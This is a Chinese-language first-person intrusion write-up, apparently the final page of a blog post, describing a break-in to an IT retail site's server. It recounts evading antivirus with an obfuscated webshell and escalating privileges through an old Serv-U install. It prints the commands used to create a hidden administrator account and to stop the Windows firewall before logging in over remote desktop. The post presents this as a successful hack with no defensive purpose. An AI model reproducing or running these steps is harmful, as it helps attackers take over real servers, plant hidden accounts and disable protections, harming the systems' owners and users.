成功入侵IT大卖场的渗透过程

那简单了，我花了一会儿免杀了下我的webshell，本机过了瑞星，上传上去，终于看到了熟悉的黑色，已经成功拿到webshell啦：

接下来就是提权了，首先检查了下组件，发现wscript.shell组件还在，于是netstat –an查看了下端口，3389与43958都开着呢，然后我在C盘Program Files下找到版本是6.2的SERV-U，看来提权不在话下啦。

添加个用户先：
cmd /c net user oldjun$ oldjun /add & net localgroup administrators oldjun$ /add
返回成功。

Net user检查了下确实成功了，立即登陆终端，可是终端客户端却无法连接。明明3389开了却连不上，难道我人品又报错了？命令行下运行net start查看了一下系统的服务，发现2003系统自带的防火墙开着，晕死。直接用SERV-U把它关掉：
cmd /c net stop sharedaccess
返回成功。

接着再连接，终于OK啦~~~~

渗透结束了，进去看了看，我们一开始的注入完全是被忽悠的，存后台用户名密码的mdb不是我们注入的那个mdb，我寒…再看看杀毒软件，装的是McAfee的VirusScan，并且启用了ScriptScan：ScriptScan扫描由Windows脚本主机执行的JavaScript和VBScript 脚本。WSH由Internet Explorer和Outlook使用。如果检测到有害的脚本，则不允许执行。怪不得我一开始的webshell用不起来呢…

上一页  [1] [2] [3]